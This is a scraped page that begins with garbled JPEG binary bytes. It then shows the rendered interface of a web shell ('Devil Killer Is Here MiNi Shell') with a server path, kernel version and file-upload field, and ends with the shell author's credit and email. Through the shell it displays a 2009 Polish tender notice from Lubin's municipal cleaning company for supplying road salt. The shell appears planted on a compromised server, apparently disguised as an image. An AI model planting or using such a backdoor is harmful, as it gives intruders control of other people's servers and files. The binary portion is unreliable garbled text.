JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/168471-N-2009.html

<p class="kh_header"><b>Lubin: Dostawa soli drogowej</b><br>
<b>Numer ogłoszenia: 168471 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa soli drogowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> (CPV) 34927100-2 Sól drogowa 
Przedmiotem zamówienia jest  dostawa wraz z rozładunkiem do siedziby Zamawiającego (ul. Rzeźnicza 1,59-300 Lubin) soli drogowej w orientacyjnej wielkości ilości około 1 500 Mg (ton), spełniającej n/w normy: 
a)granulacji od 0,16 do 5,00 mm - produkt krystaliczny, biały,
b)zanieczyszczenia mechaniczne max do 0,005 % H2O max 3 %, 
c)części nierozpuszczalne w wodzie do 0,7 %, 
d)związki chemiczne: Na Cl minimum 97,0 %, Ca max 0,45 %, Mg do 0,05 %,SO4 max 1%, Fe max 0,007 %, żelazocyjanek potasu około 40 ppm,
e)zawartość antyzbrylacza zgodnie z normą IBDiM,
f)udział frakcji pylistej od 0 - 0,16 mm, max 5%.
Ze względu na specyfikę działań Zamawiającego i wynikający z niej brak możliwości jednoznacznego sprecyzowania ilości, podana ilość soli jest wielkością szacunkową określoną  na podstawie zużycia w analogicznym okresie lat ubiegłych. Zamawiający  zastrzega sobie prawo nie zrealizowania całego zakresu dostawy w trakcie trwania umowy bez ponoszenia konsekwencji.
Wymagania dodatkowe:
1.Dostawa soli drogowej do siedziby Zamawiającego realizowana będzie przez Wykonawcę samochodami o dopuszczalnej masie całkowitej od 24-26 ton (Mg), na koszt własny.
2.Wykonawca zobowiązany jest dostarczyć zamawianą ilość soli w terminie nie dłuższym niż 24 godziny od chwili pisemnego zgłoszenia przesłanego faksem. Zamawiający na wniosek Wykonawcy może wyrazić zgodę na wydłużenie tego terminu.
3.Ustala się, że realizacja wydania towaru przez Wykonawcę będzie następować według przedsezonowych zamówień (zapasy magazynowe Zamawiającego), oraz bieżących zapotrzebowań zgłaszanych telefonicznie potwierdzonych faksem. 
4.Zamawiający zastrzega sobie prawo zawieszenia dostaw, w okresie realizacji zamówienia od miesiąca maja do października.
Warunki płatności:
1.Zapłata za dostarczoną sól następować będzie na podstawie wystawionej przez Wykonawcę fakturę VAT za poprzedni miesiąc kalendarzowy.
2.Zapłata za towar zostanie dokonana przelewem przez Zamawiającego w terminie 14 dni od otrzymania faktury VAT.  
1.Podstawą wystawienia faktur przez Wykonawcę będą dokumenty wydania WZ zawierające co najmniej: rzeczywistą ilość soli przyjętej do magazynu, datę dostawy, podpisane przez  upoważnionych przedstawicieli stron.
Miejsce dostawy: 
1.Wykonawca zobowiązany jest dostarczyć towar do dyspozycji Zamawiającego na terenie jego siedziby w Lubinie przy ulicy Rzeźniczej 1 w Lubinie, w godzinach od 07:00 do 15:00 lub na życzenie klienta w godzinach późniejszych.
2.Zamawiający zastrzega sobie prawo wyznaczenia dostawy soli w miejsce inne niż jego siedziba, położone na terenie miasta Lubina, po uprzednim powiadomieniu Wykonawcy (faksem lub droga elektroniczną)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.92.71.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości:  3.000,00 PLN
Słownie: trzy tysiące złotych 
2.Termin wniesienia wadium upływa dnia 12.10.2009 r. o godz. 09:00
3.Wadium musi obejmować okres związania z ofertą.
Wadium może być wnoszone:
1)w pieniądzu ( wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, tj. Bank PKO BP. S.A. nr rachunku 91 1020 3017 0000 2302 0174 3046,
2)w poręczeniach  bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych.
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, z późn. zmianami ).
Oznacza to, że w terminie określonym w pkt 2 ( tj. do dnia 12.10.2009 r. do godz. 09:00) w kasie Zamawiającego muszą znaleźć się ww formy wadium 
( w przypadku przesłania oferty pocztą i  wnoszenia wadium w formach wyszczególnionych w pkt. 2)-5), należy przesłać w oddzielnej przesyłce   z oznaczeniem: wadium przetargowe do postępowania pn.: Dostawa soli drogowej
W przypadku wniesienia wadium  w pieniądzu, WADIUM na koncie Zamawiającego musi się znaleźć się najpóźniej do dnia składania ofert tj. do 12.10.2009 r. do godz. 09:00 i oznaczone: wadium przetargowe pn.: Dostawa soli drogowej
O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie. decyduje data wpływu środków na rachunek bankowy Zamawiającego.
Kopia dokonanego przelewu powinna stanowić załącznik do oferty.
Załączone poręczenie lub gwarancja musi zawierać zobowiązanie zgodnie z art.46 ust 4a i ust 5 Prawo zamówień publicznych.
Zamawiający dokona zwrotu wadium lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 Prawo zamówień  publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy, którzy ubiegają się o zamówienie publiczne muszą spełniać niżej wymienione warunki :
Warunki podmiotowe:
1.Wykonawca posiada uprawnienia do wykonywania działalności lub czynności będących przedmiotem niniejszego zamówienia. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty określone w rozdziale X w pkt 1 ppkt 1) niniejszej SIWZ.
2.Spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1. Prawo zamówień publicznych. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie określone w rozdziale X w pkt 1 ppkt 2) niniejszej SIWZ.
3.Nie podlega wykluczeniu na podstawie art. 24 Prawo zamówień publicznych. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedstawić dokumenty określone w rozdziale X w pkt 1 ppkt 3),4) niniejszej SIWZ
4.Wykonawca posiada niezbędną wiedzę i doświadczenie w realizacji przedmiotu zamówienia. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedstawić dokumenty określone w rozdziale X w pkt 1 ppkt 5) niniejszej SIWZ.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana sprawdzając kompletność, poprawność oraz aktualność złożonych dokumentów i oświadczeń wyszczególnionych w rozdziale X niniejszej SIWZ  wg formuły: SPEŁNIA - NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane dokumenty należy złożyć  w formie oryginałów albo kserokopii  poświadczonej formułą za zgodność z oryginałem  i podpisane przez Wykonawcę ( lub  przez osoby upoważnione do reprezentowania Wykonawcy ) na każdej ze stron. 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 
1.  Do oferty (wypełnionego formularza ofertowego) wg wzoru stanowiącego załącznik nr 1 do SIWZ należy dołączyć następujące oświadczenia i dokumenty:
1)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 Prawo zamówień publicznych -zgodnie z załącznikiem nr 2 do SIWZ.
W przypadku, gdy inne podmioty udostępniają Wykonawcy potencjał techniczny i osoby zdolne do wykonania zamówienia do ww. oświadczenia należy dołączyć ich pisemne zobowiązanie do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3)aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego potwierdzające, ze wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego Urzędu Skarbowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4)aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że  Wykonawca  nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że   uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
5)wykaz wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadającym swoim rodzajem i wartościom dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - zgodnie z załącznikiem nr 3 do SIWZ oraz dokumenty  potwierdzające, że dostawy te zostały wykonane należycie (opinie, referencje, 
protokoły) Wykaz musi zawierać co najmniej 1 dostawę  polegającą na dostawie  soli drogowej o wartości co najmniej 100.000,00 PLN brutto. 
Pozostałe dokumenty bezwzględnie wymagane w ofercie:
6)Wypełniony Formularz Ofertowy zgodnie z  załącznikiem  nr 1 do SIWZ.
7)Oświadczenie, że oferowany przedmiot zamówienia spełnia wszystkie warunki wymienione w rozdziale III niniejszej SIWZ Opis przedmiotu zamówienia- Oświadczenie znajduje się w treści formularza ofertowego.
Pełnomocnictwo
8)Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku podpisania przez osobę nie uprawnioną do reprezentacji wprost z postanowień KRS lub ewidencji działalność gospodarczej.
9)Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu - tylko w przypadku złożenia oferty wspólnej.
Pełnomocnictwo  zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 - Kodeks Cywilny (DZ. U. Nr 16, poz. 93 z późn. zm. ) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej
Do Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ma zastosowanie § 2 Rozporządzenia Prezesa Rady Ministrów  z dnia 19 maja 2006w sprawie rodzajów dokumentów, jakich może zażądać Zamawiający  od Wykonawców, oraz form, w jakich te dokumenty mogą być składane r. ( Dz.U. Nr 87, poz. 605 )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Sp. z o.o., ul. Rzeźnicza 1, 59-300 Lubin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 09:00, miejsce: Siedziba Zamawiającego: tj. Rzeźnicza 1, 59-300 Lubin w sekretariacie (II piętro pokój 305)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com